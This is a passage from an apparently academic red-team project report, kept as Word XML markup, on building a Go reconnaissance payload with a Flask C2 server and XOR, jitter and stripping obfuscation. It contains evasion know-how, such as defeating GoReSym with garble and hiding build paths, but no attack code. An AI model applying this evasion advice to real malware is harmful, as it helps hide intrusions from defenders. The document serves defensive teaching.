    <w:p w14:paraId="13F283F5" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc226583767"/>
      <w:r>
        <w:t>Key Limitation — The .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gopclntab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Section</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="59BCF929" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Binary stripping raises the cost of analysis but does not prevent it. Every Go binary contains a section called .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gopclntab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Go program counter to line table) which the runtime requires to handle panics and stack traces at runtime. This section cannot be removed with -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldflags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> because doing so would break the binary. A Mandiant tool called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoReSym</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reads .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gopclntab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directly and recovers all function names from a stripped binary in under one minute. Additionally, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoReSym</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exposes the full build path embedded in the binary, revealing the operator's username and directory structure — a significant OPSEC consideration. The only remedy is to compile from a neutral path or use garble, a build-time obfuscator that defeats </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoReSym</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by randomising these values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AF8BB6" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="068F9B97" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="4E50947F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc226583768"/>
      <w:r>
        <w:t>7. Tools and Technologies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="045D9F29" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16AFA543"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C0DF0" w14:paraId="2FA3D74C"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63CC1C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tool / Technology</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9A4707" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Role in Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="65D7330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74CE9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Go (Golang) 1.22+</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E595D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">All payload development — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>net_scan.go</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, v2, v3, v4 (XOR), v5 (jitter), v5_final (stripped)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="22430BE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C8EA0" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Python 3.11 + Flask</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83AC2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2 listener (port 5000) and documentation site (port 8000)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="15E32FE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B83B2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Visual Studio Code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7E5AE" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IDE for Go and Python development on Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="6962A72A"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0D73B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Windows 10/11 VM (VirtualBox/VMware)</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DBC03" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Isolated target environment for payload detonation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="1361AEC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3DB91" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sysmon + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SwiftOnSecurity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> config</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AECF7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Endpoint event logging — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EventIDs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1, 3, 11, 13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="644EC89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AC343" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Wireshark</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1B94E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Captures HTTP beacon traffic, visualises beacon timing and jitter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="0CFF02E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322CD" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysinternals</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Autoruns, strings.exe)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ADE4E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Persistence detection and binary string analysis before/after XOR encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="7DD61A0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1FCE22" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ghidra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (NSA)</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33C340" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reverse engineering — before/after binary stripping function name comparison</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="4651CF3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09B91" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GoReSym</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Mandiant)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CBF40" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Demonstrates limits of binary stripping by recovering function names from stripped binary via .</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gopclntab</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="300CFAD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7706F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Detect-It-Easy (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DiE</w:t>
            </w:r>
            <w:proofErr w:type="spell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12B0B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Compiler identification — confirms binary is Go regardless of stripping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="49D1A48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1077D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PEStudio</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93561" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PE header analysis and entropy measurement — confirms XOR obfuscation via elevated section entropy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="4FBAF13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1A42A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK</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239FEB" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Technique mapping for every offensive capability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="2409A2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45B64" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cyber Kill Chain (Lockheed Martin)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2DCB3" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Campaign structure framework for the overall project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20BB7D11" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="53B9C666" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="18FD0D00" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc226583769"/>
      <w:r>
        <w:t>8. Ethical Considerations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="3EE87997" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="778D5F5B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="05902D88" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This project is conducted strictly within a controlled, isolated laboratory environment. No testing is performed on live systems or production networks. All payloads execute only within a designated Windows VM with no internet access. The C2 server is bound to the local lab network only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072F7D79" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="43ED2DE0" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The purpose of the project is to strengthen defensive awareness and detection capability. Every offensive technique documented includes the corresponding defensive countermeasure. The project does not produce any tool designed to harm or intended for use outside the academic context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D05B693" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="5331EEF5" w14:textId="2E4E2F05" w:rsidR="002C0DF0" w:rsidRDefault="00E22C70">
      <w:r>
        <w:t>The documentation website has been deployed publicly to AWS for educational access. No compiled binaries are distributed — only Go source files and lesson documentation. The C2 server remains local to the lab environment only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA903C5" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="18028372" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33796EF4" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc226583770"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9. General Issues</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="54A24581" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70514EE9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="7A4D33CE" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This section addresses the broader project-level outcomes: problems encountered and resolved, what was achieved, what remains outstanding, lessons learned, and what would be done differently if starting again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC96D14" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="106A933A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="639ECE64" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc226583771"/>
      <w:r>
        <w:t>9.1  Problems Encountered</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="5E60C69E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>AV interference: Windows Defender on the target VM flagged the compiled .exe on some builds. Resolved by temporarily disabling real-time protection in the VM — this is expected behaviour and is documented as a detection signal in the blue team analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B071A4" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>C2 connectivity: Port 5000 on the operator machine needed to be allowed through Windows Firewall for the VM to reach the Flask server. Added an inbound rule (TCP 5000) on the operator machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29047D0B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Go cross-compilation: Initial builds produced Linux ELF binaries instead of Windows .exe files due to missing GOOS/GOARCH variables. Resolved once the go build command included GOOS=windows GOARCH=amd64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3DC805" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>wmic deprecation: wmic.exe is deprecated in newer Windows builds. On some lab configurations the command returned no output. The documentation notes the PowerShell CIM equivalent (Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CimInstance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Win32_LogicalDisk) as an alternative.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592F240F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="00872ECA" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="5D1ABEF7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc226583772"/>
      <w:r>
        <w:t>9.2  What Was Achieved</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="661D03CA" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The following table summarises the completion status of each project phase at the time of this report:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02273D92"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2C0DF0" w14:paraId="237F9D97" w14:textId="77777777">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71ADB5" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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21BDEA" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="67C86145"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D6CB0" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase 01 — Foundation (Go env, compilation)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F9D09" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="7942169B"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88FC7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase 02 — Reconnaissance (v1, v2, v3 payloads)</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07480" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="4A5E3692"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A3CC7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase 03 — C2 Server (Flask listener + exfil)</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AA3E4" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="3A4DB027"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06997" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase 04 — Obfuscation (XOR, jitter, stripping)</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BF8492" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="11D5C172"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9D36" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Blue Team Analysis page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B00AD" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="4EC5AED8"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AE8A9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Documentation website (all pages)</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C88B7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="6CE5E49E"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1708F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Final write-up</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7DA7E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A80813A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="3EEA636A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All four project phases are fully complete. The core deliverables — three progressively capable reconnaissance payloads, a working Flask C2 server, three implemented obfuscation techniques (XOR string encoding, sleep jitter, and binary stripping), a </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>comprehensive blue team analysis, and a full documentation website — have all been implemented, tested, and documented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F4AF14" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="05ED5661" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="7D177EFB" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc226583773"/>
      <w:r>
        <w:t>9.3  What Was Not Achieved</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="096F68C9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
